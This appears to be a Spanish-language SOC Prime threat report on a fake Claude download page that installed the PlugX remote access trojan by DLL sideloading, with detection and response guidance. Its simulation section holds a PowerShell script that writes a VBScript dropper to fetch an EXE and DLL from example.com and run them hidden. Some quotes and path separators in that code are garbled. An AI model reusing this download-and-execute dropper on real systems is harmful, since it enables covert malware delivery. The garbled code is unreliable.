SOC Prime Bias: Medio

14 Apr 2026 15:55 UTC

El sitio falso de Claude instala malware que da a los atacantes acceso a tu computadora

Author Photo
SOC Prime Team linkedin icon Seguir
El sitio falso de Claude instala malware que da a los atacantes acceso a tu computadora
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los atacantes configuraron una página de descarga falsa de Claude que entregó un archivo ZIP troyanizado a usuarios desprevenidos. Una vez abierto, el archivo instaló un cliente de escritorio Claude aparentemente legítimo mientras desplegaba encubiertamente el troyano de acceso remoto PlugX a través de la carga lateral de DLL con un actualizador firmado de G DATA. La carga maliciosa se colocó en la carpeta de Inicio del usuario para mantener la persistencia y luego inició la comunicación HTTPS saliente con un servidor de mando y control. La campaña muestra cómo los actores de amenazas están explotando cada vez más el interés en herramientas de IA populares como señuelo de ingeniería social para un compromiso inicial.

Investigación

Durante el análisis, los investigadores descomprimieron el archivo ZIP, identificaron la ruta de instalación del MSI y siguieron la ejecución hasta un dropper de VBScript que escribió NOVUpdate.exe, un avk.dllmalicioso, y un archivo de datos encriptados en la carpeta de Inicio. La ejecución en sandbox confirmó que el binario cargado lateralmente se lanzó con éxito, alteró una clave de registro relacionada con TCP/IP, e inició conexiones salientes a través del puerto 443 a una dirección IP alojada en Alibaba Cloud. Estos hallazgos confirmaron la entrega de PlugX a través de una cadena de infección por etapas disfrazada de software legítimo de IA.

Mitigación

Los usuarios deben descargar el software de Claude solo de fuentes oficiales verificadas y validar la autenticidad de los paquetes de instalación antes de la ejecución. Los defensores deben inspeccionar las carpetas de Inicio en busca de binarios o DLLs inesperados, especialmente archivos que imiten componentes de actualización legítimos. También se debe revisar la telemetría del firewall y del endpoint en busca de tráfico HTTPS saliente sospechoso relacionado con aplicaciones recién instaladas. Eliminar los archivos maliciosos, revertir cualquier cambio no autorizado en el registro y ejecutar un escaneo anti-malware confiable son pasos clave para contener la amenaza.

Respuesta

Los equipos de seguridad deben detectar y alertar sobre la presencia de NOVUpdate.exe, avk.dll, o NOVUpdate.exe.dat dentro del directorio de Inicio. Las detecciones adicionales deben centrarse en binarios de actualizadores de G DATA firmados que carguen DLLs no confiables y establezcan sesiones TLS salientes inesperadas hacia la infraestructura identificada. Los hosts afectados deben someterse a una completa remediación y revisión forense para confirmar que no queden otros componentes de PlugX, mecanismos de persistencia, o cargas útiles posteriores activas.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: El chequeo Prevuelo de Telemetría & Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos:
    Un atacante elabora un script VBS malicioso que descarga la carga útil NOVUpdate.exe desde un servidor de mando y control (C2), lo escribe en %TEMP%, y luego lo lanza a través de wscript.exe. El mismo script también carga avk.dll desde la misma ubicación para lograr la carga lateral de DLL. El atacante se apoya en el Windows Script Host (WSH) incorporado para evitar levantar sospechas de las heurísticas tradicionales de AV.

    1. Escribe el archivo VBS malicioso (malicious.vbs) a %TEMP%.
    2. Invocar wscript.exe con la ruta al archivo VBS.
    3. El script VBS realiza un GET HTTP para obtener NOVUpdate.exe and avk.dll, los escribe en el disco y ejecuta NOVUpdate.exe.
  • Script de Prueba de Regresión:

    # --------------------------------------------------------------------
    # Simulación de dropper malicioso – activa la regla Sigma
    # --------------------------------------------------------------------
    $tempDir = "$env:TEMPDropperDemo"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    # 1. Crear un VBS malicioso que descargue dos archivos y ejecute NOVUpdate.exe
    $vbsPath = "$tempDirmalicious.vbs"
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.open "GET", "http://example.com/NOVUpdate.exe", False
    objXML.send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
    objStream.Close
    End If

‘ Descargar avk.dll (usado para carga lateral de DLL) objXML.open «GET», «http://example.com/avk.dll«, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(«ADODB.Stream») objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile «$tempDiravk.dll», 2 objStream.Close End If

‘ Ejecutar el EXE descargado CreateObject(«WScript.Shell»).Run «»»$tempDirNOVUpdate.exe»»», 0, False «@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Ejecutar el script vía wscript.exe (esta es la telemetría que estamos probando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPCIONAL: pausa para permitir que se dispare la detección
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
  • Comandos de Limpieza:

    # Eliminar todos los artefactos creados por la simulación
    $tempDir = "$env:TEMPDropperDemo"
    if (Test-Path $tempDir) {
        Remove-Item -Path $tempDir -Recurse -Force
    }
    
    # Asegúrate de que cualquier proceso NOVUpdate.exe restante sea terminado
    Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force